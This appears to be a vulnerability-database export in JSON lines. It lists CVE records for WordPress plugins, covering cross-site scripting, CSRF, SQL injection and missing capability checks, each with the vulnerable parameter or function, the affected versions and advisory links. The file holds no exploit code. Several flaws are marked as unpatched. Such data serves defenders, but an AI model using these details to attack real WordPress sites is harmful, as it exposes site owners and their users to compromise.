{"CVE_ID":"CVE-2025-6387","slug":"wp-get-the-table","versionImpact":"1.5","description":"The WP Get The Table plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter in all versions up to, and including, 1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-get-the-table\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-get-the-table\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bd18b7a-6555-4838-821d-fcbe0be34ac4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bd18b7a-6555-4838-821d-fcbe0be34ac4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2735","slug":"groundhogg","versionImpact":"2.7.9.8","description":"The Groundhogg plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'gh_form' shortcode in versions up to, and including, 2.7.9.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Please note this only works with legacy contact forms.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2914493\\\/groundhogg\\\/trunk\\\/includes\\\/better-meta-compat.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2914493\\\/groundhogg\\\/trunk\\\/includes\\\/better-meta-compat.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4938206e-2ea4-47ed-a307-87cf67dd74a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4938206e-2ea4-47ed-a307-87cf67dd74a4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/includes\\\/shortcodes.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/includes\\\/shortcodes.php#L51\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/includes\\\/form\\\/form.php#L187\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/includes\\\/form\\\/form.php#L187\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1807","slug":"stax-addons-for-elementor","versionImpact":"1.4.3","description":"The Elementor Addons, Widgets and Enhancements \u2013 Stax plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.4.3. This is due to missing or incorrect nonce validation on the toggle_widget function. This makes it possible for unauthenticated attackers to enable or disable Elementor widgets via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stax-addons-for-elementor\\\/trunk\\\/core\\\/admin\\\/pages\\\/Widgets.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stax-addons-for-elementor\\\/trunk\\\/core\\\/admin\\\/pages\\\/Widgets.php#L31\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c12094bd-aa23-4f9b-92e1-d1d4284fb2a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c12094bd-aa23-4f9b-92e1-d1d4284fb2a0?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3011","slug":"armember-membership","versionImpact":"4.0.5","description":"The ARMember plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.0.5. This is due to missing or incorrect nonce validation on the arm_check_user_cap function. This makes it possible for unauthenticated attackers to perform multiple unauthorized actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42f5f29b-2d83-4b15-82aa-0598f8a2317b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42f5f29b-2d83-4b15-82aa-0598f8a2317b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2932691\\\/armember-membership\\\/trunk\\\/autoload.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2932691\\\/armember-membership\\\/trunk\\\/autoload.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36769","slug":"widget-settings-importexport","versionImpact":"1.5.3","description":"The Widget Settings Importer\/Exporter Plugin  for WordPress is vulnerable to Stored Cross-Site Scripting via the wp_ajax_import_widget_dataparameter AJAX action in versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with subscriber-level permissions and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e14f0fc6-fca4-4dd7-8f7b-ed5ed535c9af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e14f0fc6-fca4-4dd7-8f7b-ed5ed535c9af?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/04\\\/unpatched-high-severity-vulnerability-in-widget-settings-importer-exporter-plugin\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/04\\\/unpatched-high-severity-vulnerability-in-widget-settings-importer-exporter-plugin\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1127","slug":"eventprime-event-calendar-management","versionImpact":"3.4.1","description":"The EventPrime \u2013 Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the booking_export_all() function in all versions up to, and including, 3.4.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve all event booking which can contain PII.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39da62be-e630-48cd-b732-80ed3d337638?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39da62be-e630-48cd-b732-80ed3d337638?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/trunk\\\/\\\/includes\\\/service\\\/class-ep-ajax.php#L1994\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/trunk\\\/\\\/includes\\\/service\\\/class-ep-ajax.php#L1994\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4705","slug":"testimonials-widget","versionImpact":"4.0.4","description":"The Testimonials Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's testimonials shortcode in all versions up to, and including, 4.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef4603b2-bd41-4f65-ba2a-8d06e32e67c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef4603b2-bd41-4f65-ba2a-8d06e32e67c1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-widget\\\/trunk\\\/includes\\\/class-testimonials-widget-premium.php#L2198\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-widget\\\/trunk\\\/includes\\\/class-testimonials-widget-premium.php#L2198\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6859","slug":"wp-multitasking","versionImpact":"0.1.12","description":"The WP MultiTasking  WordPress plugin through 0.1.12 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/34ae6121-304f-495b-bcc1-4fbd3d70a9fb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/34ae6121-304f-495b-bcc1-4fbd3d70a9fb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8548","slug":"kb-support","versionImpact":"1.6.6","description":"The KB Support \u2013 WordPress Help Desk and Knowledge Base plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on several functions in all versions up to, and including, 1.6.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform multiple administrative actions, such as replying to arbitrary tickets, updating the status of any post, deleting any post, adding notes to tickets, flagging or unflagging tickets, and adding or removing ticket participants.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fb90b3b-08bd-4887-a6bf-054b42d3e403?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fb90b3b-08bd-4887-a6bf-054b42d3e403?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L138\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L138\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L172\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L172\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L211\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L211\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L240\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L240\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L458\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L458\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L531\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L531\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L580\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L580\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L605\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L605\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L630\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L630\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L649\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L649\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L801\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L801\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L869\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L869\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9382","slug":"gantry","versionImpact":"4.1.21","description":"The Gantry 4 Framework plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'override_id' parameter in all versions up to, and including, 4.1.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d539a066-6b59-4235-868e-f3085436e9f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d539a066-6b59-4235-868e-f3085436e9f4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gantry\\\/trunk\\\/admin_functions.php#L677\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gantry\\\/trunk\\\/admin_functions.php#L677\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13880","slug":"my-quota","versionImpact":"1.0.8","description":"The My Quota WordPress plugin through 1.0.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bee3b002-e808-4402-8bf6-4375ed7b3807\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bee3b002-e808-4402-8bf6-4375ed7b3807\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6212","slug":"ultimate-addons-for-contact-form-7","description":"The Ultra Addons for Contact Form 7 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Database module in versions 3.5.11 to 3.5.19 due to insufficient input sanitization and output escaping. The unfiltered field names are stored alongside the sanitized values. Later, the admin-side AJAX endpoint ajax_get_table_data() returns those raw names as JSON column headers, and the client-side DataTables renderer injects them directly into the DOM without any HTML encoding. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-contact-form-7\\\/trunk\\\/addons\\\/database\\\/assets\\\/js\\\/database-pro-main.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-contact-form-7\\\/trunk\\\/addons\\\/database\\\/assets\\\/js\\\/database-pro-main.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-contact-form-7\\\/trunk\\\/addons\\\/database\\\/database.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-contact-form-7\\\/trunk\\\/addons\\\/database\\\/database.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3316177\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3316177\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-addons-for-contact-form-7\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-addons-for-contact-form-7\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f49e48cb-7d0b-4bcf-9090-869472b8442a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f49e48cb-7d0b-4bcf-9090-869472b8442a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6385","slug":"wp-applink","versionImpact":"0.4.1","description":"The WP Applink plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018title\u2019 parameter in all versions up to, and including, 0.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-applink\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-applink\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75e41e78-ce8c-4248-9eca-b36391fbbbde?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75e41e78-ce8c-4248-9eca-b36391fbbbde?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28664","slug":"wp-meta-data-filter-and-taxonomy-filter","description":"The Meta Data and Taxonomies Filter WordPress plugin, in versions < 1.3.1, is affected by a reflected cross-site scripting vulnerability in the 'tax_name' parameter of the mdf_get_tax_options_in_widget action, which can only be triggered by an authenticated user.","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-3\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2717","slug":"groundhogg","versionImpact":"2.7.9.8","description":"The Groundhogg plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.7.9.8. This is due to missing nonce validation on the 'enable_safe_mode' function. This makes it possible for unauthenticated attackers to enable safe mode, which disables all other plugins, via a forged request if they can successfully trick an administrator into performing an action such as clicking on a link. A warning message about safe mode is displayed to the admin, which can be easily disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af73240c-b711-4e91-9998-5f7e6a9a4fb9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af73240c-b711-4e91-9998-5f7e6a9a4fb9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/admin\\\/help\\\/help-page.php#L67\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/admin\\\/help\\\/help-page.php#L67\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2914493\\\/groundhogg\\\/tags\\\/2.7.10\\\/admin\\\/help\\\/help-page.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2914493\\\/groundhogg\\\/tags\\\/2.7.10\\\/admin\\\/help\\\/help-page.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1615","slug":"ultimate-addons-for-contact-form-7","versionImpact":"3.1.23.","description":"The Ultimate Addons for Contact Form 7 plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in versions up to, and including, 3.1.23. This makes it possible for authenticated attackers of any authorization level to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-addons-for-contact-form-7\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-addons-for-contact-form-7\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2901676\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2901676\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-contact-form-7\\\/trunk\\\/addons\\\/database\\\/database.php?rev=2897709#L255\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-contact-form-7\\\/trunk\\\/addons\\\/database\\\/database.php?rev=2897709#L255\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/817ca119-ddaf-4525-beee-68c4e0aac544?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/817ca119-ddaf-4525-beee-68c4e0aac544?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2869","slug":"wp-members","versionImpact":"3.4.7.3","description":"The WP-Members Membership plugin for WordPress is vulnerable to unauthorized plugin settings update due to a missing capability check on the do_field_reorder function in versions up to, and including, 3.4.7.3. This makes it possible for authenticated attackers with subscriber-level access to reorder form elements on login forms.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/trunk\\\/includes\\\/admin\\\/tabs\\\/class-wp-members-admin-tab-fields.php?rev=2895180#L799\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/trunk\\\/includes\\\/admin\\\/tabs\\\/class-wp-members-admin-tab-fields.php?rev=2895180#L799\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2920897\\\/wp-members\\\/trunk\\\/includes\\\/admin\\\/tabs\\\/class-wp-members-admin-tab-fields.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2920897\\\/wp-members\\\/trunk\\\/includes\\\/admin\\\/tabs\\\/class-wp-members-admin-tab-fields.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf05a79a-0375-4c9d-bbf0-a87484327b87?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf05a79a-0375-4c9d-bbf0-a87484327b87?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6922","slug":"coming-soon-maintenance-mode-from-acurax","versionImpact":"2.6","description":"The Under Construction \/ Maintenance Mode from Acurax plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 2.6 via the 'acx_csma_subscribe_ajax' function. This can allow authenticated attackers to extract sensitive data such as names and email addresses of subscribed visitors.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a75f4eb-698b-4c92-9829-de6c55e21ecb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a75f4eb-698b-4c92-9829-de6c55e21ecb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/coming-soon-maintenance-mode-from-acurax\\\/trunk\\\/function.php?rev=2539156#L612\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/coming-soon-maintenance-mode-from-acurax\\\/trunk\\\/function.php?rev=2539156#L612\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1126","slug":"eventprime-event-calendar-management","versionImpact":"3.4.1","description":"The EventPrime \u2013 Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_attendees_email_by_event_id() function in all versions up to, and including, 3.4.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to to retrieve the attendees list for any event.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d266b6ee-24ec-4363-a986-5ccd4db5ae3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d266b6ee-24ec-4363-a986-5ccd4db5ae3c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3973","slug":"house-manager","versionImpact":"1.0.8.4","description":"The House Manager  WordPress plugin through 1.0.8.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c6ce66e-091a-41da-a13d-5f80cadb499a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c6ce66e-091a-41da-a13d-5f80cadb499a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
